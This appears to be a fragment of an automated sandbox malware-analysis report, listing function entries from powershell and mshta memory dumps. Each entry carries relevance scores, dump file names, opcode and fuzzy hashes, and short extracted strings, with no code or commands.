                                                                                                                                                                                                                                • Instruction ID: aba264dbc714f293cb06ca8476a46ee9645c7f8654546d4143383e80b78c6567
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8371deea9873b724ba65b565c6312fe3094db59aa7cbd62ecc16270d50b7849
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF5141303840788FD729AB7DDA5496C3BD7BF8975431424AAE016CF3B5EE16EC828752
                                                                                                                                                                                                                                Function 07D437A8 Relevance: 8.9, Strings: 7, Instructions: 186COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q$:j$:j
                                                                                                                                                                                                                                • API String ID: 0-570636503
                                                                                                                                                                                                                                • Opcode ID: 0489f5a1a6421b04a7f3870d348f72cf7c398be728236b202efb88c216aff97c
                                                                                                                                                                                                                                • Instruction ID: b5a63fd01d06a3a0c1757f5aa99dd4e5ce84343424ebcc84ead70012e52231ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0489f5a1a6421b04a7f3870d348f72cf7c398be728236b202efb88c216aff97c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 095159B1B043469FDB255A6DDC00766FBB6EFC2610F28806BD485EB351DE36C845C7A1
                                                                                                                                                                                                                                Function 04E2F110 Relevance: 6.7, Strings: 5, Instructions: 450COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0oAp$0oAp$0oAp$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-1007036685
                                                                                                                                                                                                                                • Opcode ID: dd583610239b8411fcdf5ef2833f74469be0732025f54d0e2dd07d18891adce3
                                                                                                                                                                                                                                • Instruction ID: 529c083ffede1fe604fface15540368a5a579a52d70e1d92e821924ac58cbf4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd583610239b8411fcdf5ef2833f74469be0732025f54d0e2dd07d18891adce3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CE1F130B401218FDB149F7C9A1462E77E7AFC9B18B2454AAD802DF3A5EE74EC4297D1
                                                                                                                                                                                                                                Function 04E27AE0 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: tMDj$`_q$`_q$`_q$`_q
                                                                                                                                                                                                                                • API String ID: 0-3087278052
                                                                                                                                                                                                                                • Opcode ID: e28df4db64e4a6f11a4a5e84033dc6b0dafa573c63f2108bf538776018e51d41
                                                                                                                                                                                                                                • Instruction ID: 93e001f74d3953afc4d5b90da070ecf602cf7cd8442a1be8098608bbebd47d0a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e28df4db64e4a6f11a4a5e84033dc6b0dafa573c63f2108bf538776018e51d41
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07B1B874E002199FDB54DFA9D990A9DFBF2FF48304F10862AD819AB354EB30A945CF90
                                                                                                                                                                                                                                Function 04E27AF0 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: tMDj$`_q$`_q$`_q$`_q
                                                                                                                                                                                                                                • API String ID: 0-3087278052
                                                                                                                                                                                                                                • Opcode ID: b98f9de3b5535c8151c543714a15b3604158988e3e26000832f6036ba4eda880
                                                                                                                                                                                                                                • Instruction ID: 956cbf02d7b413a53e2e1c3e7ba4528d235a012ba9d4b94ccc9734af1cef4187
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b98f9de3b5535c8151c543714a15b3604158988e3e26000832f6036ba4eda880
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5B1B874E002199FDB54DFA9D990A9DFBF2FF48304F10962AD819AB354EB30A945CF90
                                                                                                                                                                                                                                Function 04E27300 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `_q$`_q$`_q$`_q
                                                                                                                                                                                                                                • API String ID: 0-3297199963
                                                                                                                                                                                                                                • Opcode ID: f9f843b0eca1cd6264e03f8422bff2b0ce2b32d2b10101c5ab05b19fb1631cea
                                                                                                                                                                                                                                • Instruction ID: 2560dafc7aa2c8cf032b16a33018ec6055e651dd04531373fbf1cc77b7815e34
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9f843b0eca1cd6264e03f8422bff2b0ce2b32d2b10101c5ab05b19fb1631cea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F815374E012199FDB54DFA9DA90A9DFBF1FF48304F20862AD819AB315E730A945CF90
                                                                                                                                                                                                                                Function 07D458A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                                                                                                                • Opcode ID: 9886acc8ff41deb9caa46abbc7b75bcc28c70c302c8fcaf06a0c2dc135b5c7bf
                                                                                                                                                                                                                                • Instruction ID: 1d10502984bde768a85eb12362f63e34ee78dcb319c75a1b76ec9f240219b9ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9886acc8ff41deb9caa46abbc7b75bcc28c70c302c8fcaf06a0c2dc135b5c7bf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 002136B175431A6BEB28592AEC40B37E7EA9BC5720F28843BE546CF385DD32C855C361
                                                                                                                                                                                                                                Function 07D434F4 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ,SDj$_$p54i$RDj
                                                                                                                                                                                                                                • API String ID: 0-989244144
                                                                                                                                                                                                                                • Opcode ID: 4954a80c938c7e0b66845425d3449f8b555e8d5c8c17b1e7f1da150b22ef6998
                                                                                                                                                                                                                                • Instruction ID: a7c282877410610b4de23b3d8d8497dd78a65816cd715ceb5b6b2b86bed04334
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4954a80c938c7e0b66845425d3449f8b555e8d5c8c17b1e7f1da150b22ef6998
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68213DF59043069FEB10DE1CC900BAAFFE1EB95620F5981A6D45CA7292D735C981CB62
                                                                                                                                                                                                                                Function 07D40309 Relevance: 5.1, Strings: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                                                                                                                • Opcode ID: 4eab53fc1bc309c4088538f70bf9b03359dbf8b1627ed1973c47ab9f8ebbd423
                                                                                                                                                                                                                                • Instruction ID: 2571223832e28ef7053a6d3f23b039373797411bb3f463f73649509f5d847427
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4eab53fc1bc309c4088538f70bf9b03359dbf8b1627ed1973c47ab9f8ebbd423
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD01846170A7D54FC72B16785924555AFB69F8391071A44DBC181CF29BCD154C8DC3B3
                                                                                                                                                                                                                                Function 07D42237 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $^q$$^q$JEj$JEj
                                                                                                                                                                                                                                • API String ID: 0-3755646021
                                                                                                                                                                                                                                • Opcode ID: b2926473b3bf54394a0beec625d69b593d247e276c2925f5ba972def7afdfa9d
                                                                                                                                                                                                                                • Instruction ID: 5003b1472437f7b7c5fdac9747cd4ce3e693a85b3728c4616751b9736b7b33bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2926473b3bf54394a0beec625d69b593d247e276c2925f5ba972def7afdfa9d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01DFB264A3C55FC72706688C10582BFB66F9361071A45E7D490CF26BC8299C99C3A3

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 05D10FE7 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000003.2528875846.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_3_5d10000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                                                                                                • Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 07180E50 Relevance: 2.9, Strings: 2, Instructions: 383COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ek$ek
                                                                                                                                                                                                                                • API String ID: 0-3049552177
                                                                                                                                                                                                                                • Opcode ID: fb8b65de90132a7d8db2fd206919cff7324b35be2b6dd7b03d0955adc23d669d
                                                                                                                                                                                                                                • Instruction ID: 3c7f1fb9864b3daf72b3d351568656784603b25ede7834479f6ad445ae727c8e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb8b65de90132a7d8db2fd206919cff7324b35be2b6dd7b03d0955adc23d669d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20C15BB270424D9FCB55AB78994066BFBE79FC9310F24806AE505CB392DB36CC46CB61
                                                                                                                                                                                                                                Function 071805D0 Relevance: 2.9, Strings: 2, Instructions: 354COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                • API String ID: 0-2697143702
                                                                                                                                                                                                                                • Opcode ID: 87f57a1ffc37be518eac623d3efac41e8e853fb033c3d2c0fae0fcb44b799acf
                                                                                                                                                                                                                                • Instruction ID: b7802be263fd8ef05d0805aed413ea9140d271eee182508ecd36357cfcfa41d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87f57a1ffc37be518eac623d3efac41e8e853fb033c3d2c0fae0fcb44b799acf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0C12BB1F0421A9FCB55AF79844066ABBA6EFCA310F14846AD545CF291DB31C889CFE1
                                                                                                                                                                                                                                Function 07E10D04 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (bq$(bq
                                                                                                                                                                                                                                • API String ID: 0-4224401849
                                                                                                                                                                                                                                • Opcode ID: 5ee59744c643f2e3697477689f5885bf3ad9f3e9923d6382eaeff9c690fe2f11
                                                                                                                                                                                                                                • Instruction ID: 2e529430ecde28b9f0c2ec4e154f399ba20c041f84a279f889f941ed5b30a3d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ee59744c643f2e3697477689f5885bf3ad9f3e9923d6382eaeff9c690fe2f11
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E71C070A006199FCB14DFA9C85469EBBF6FF88310F108629D906BB350EB74AD85CB81
                                                                                                                                                                                                                                Function 071805B4 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q
                                                                                                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                                                                                                • Opcode ID: f3e4ccf807e02fb52d5c22cb7097e3a52bc29925a87488672c709d996dd87220
                                                                                                                                                                                                                                • Instruction ID: 6784dcf562470ff9ed9c28936d776bc49fb8b70d69268d6e694843f64d4e6e6e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3e4ccf807e02fb52d5c22cb7097e3a52bc29925a87488672c709d996dd87220
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E82195F4B0520EDFCB95EF28C544BA6BBF1AF89364F258169D1088B591D731C988CFA1
                                                                                                                                                                                                                                Function 07E10CE4 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (bq
                                                                                                                                                                                                                                • API String ID: 0-149360118
                                                                                                                                                                                                                                • Opcode ID: 40673e3435e8d3c0a8831329cbbef77d6f7665a2646037109e3bf3d4db164ef6
                                                                                                                                                                                                                                • Instruction ID: 8473fa91555e9d281e6abc8203b4a491f47e64499486fc3ebc460c63696e750c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40673e3435e8d3c0a8831329cbbef77d6f7665a2646037109e3bf3d4db164ef6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E01F17031A244DFD3056B799864A2E7BA6EFC3351B1484BAD502CB291DE349C02C766
                                                                                                                                                                                                                                Function 07E10448 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6fc04097d274b798abdd4b66cd4154aba8cc625a5a9e56c30023b076664b183e
                                                                                                                                                                                                                                • Instruction ID: f633033352cfe245c391c174d770bfc0f06534ba652dc34b74afb54bced61f6f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fc04097d274b798abdd4b66cd4154aba8cc625a5a9e56c30023b076664b183e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FD118B4A01219DFDB14DF98D584A9DFBB2FF88314F248159E809AB365C731ED85CB90
                                                                                                                                                                                                                                Function 041E8BC0 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0e1324540655e4399fbeef5b8703b5c771c261a1bc1406e3b6f2a3c87a8bbf25
                                                                                                                                                                                                                                • Instruction ID: ee0b4769d9aa20b78b18d5cb08eda15b1e1b8d0f9ad29c148357658c01094d32
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e1324540655e4399fbeef5b8703b5c771c261a1bc1406e3b6f2a3c87a8bbf25
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE516F75A00609CFCB14DF69C984AAAFBF5FF88310B14C669D819DB355EB30E945CBA0
                                                                                                                                                                                                                                Function 041E5988 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 33cedd0f424eef36c9129baf207918cd4c89535c427af24298faea994bfe9d27
                                                                                                                                                                                                                                • Instruction ID: 2e09c3e2cac3ef147f46945f11e7b760ba330d691ffff25aa225d3a741fbd51d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33cedd0f424eef36c9129baf207918cd4c89535c427af24298faea994bfe9d27
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F419070300604AFE308EBA9D9D4B6AB7A3EF84314F508578951A9F3A5DF71FC498B90
                                                                                                                                                                                                                                Function 041E8F50 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d976b8057107c4ca041efdf05ce7fb168c3c55b92907ee86411766df5bd55a9c
                                                                                                                                                                                                                                • Instruction ID: c58ca3b51b146438ada0f34443d42c29ee93a63db747a7470caf08025b7e3ee6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d976b8057107c4ca041efdf05ce7fb168c3c55b92907ee86411766df5bd55a9c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96419F75A003099FDB10CF9AD884AEEBBF5FF88314F14846AE515AB350C735A941CB90
                                                                                                                                                                                                                                Function 041E3060 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0e2caf4015b0464f08b71fa93f385c35833b2c24512b847548d973174e15c612
                                                                                                                                                                                                                                • Instruction ID: a903e79bad7018f12ddcf7b1ea2e3603e90cd699c76960e485fa105d70cbbdb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e2caf4015b0464f08b71fa93f385c35833b2c24512b847548d973174e15c612
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D44105B4A009099FCB09CF59C5D49BAFBB1FF48310B1585A9D816AB368C736FD50CBA0
                                                                                                                                                                                                                                Function 07E10415 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0012f5407e31036098bb2a1895851609c319dda0b84fcfb7afae2dabb3770d1a
                                                                                                                                                                                                                                • Instruction ID: f01c2d0b6dfb235d9a12fe0f4546d32d7b9c49b7154780e128d37effd6ac833a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0012f5407e31036098bb2a1895851609c319dda0b84fcfb7afae2dabb3770d1a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C41B070A0A3859FCB02DF1CC8A0999BFB0FF4A310B168496D484DB366D334EC95CBA1
                                                                                                                                                                                                                                Function 041EC91C Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: da177f05cca241904583baddab934ae06ec3d775edd534e0fcd483337bfa55c7
                                                                                                                                                                                                                                • Instruction ID: 1a01b23ac9e2861748a3b3e5f1703ac34b485f800e7c5f96e93b6d6c02d8cd2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da177f05cca241904583baddab934ae06ec3d775edd534e0fcd483337bfa55c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41C2B1D00709DBDB20DFAAC984ADDFBB5BF48314F648019D409BB215E7756A4ACF90
                                                                                                                                                                                                                                Function 041EC608 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d9d589fb010905d787129c67247b9907775dd1e0fcb6cb2d0b02c9fa4866b230
                                                                                                                                                                                                                                • Instruction ID: b200d6be3edfd9f6b844f2c2c3640ade639c0fc303b2eb62528840ed16f57344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9d589fb010905d787129c67247b9907775dd1e0fcb6cb2d0b02c9fa4866b230
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3313E74700600AFD754DF6ED890A77BBEAEBC8714B10856EE54DC7751EB70AC118BA0
                                                                                                                                                                                                                                Function 041EC334 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
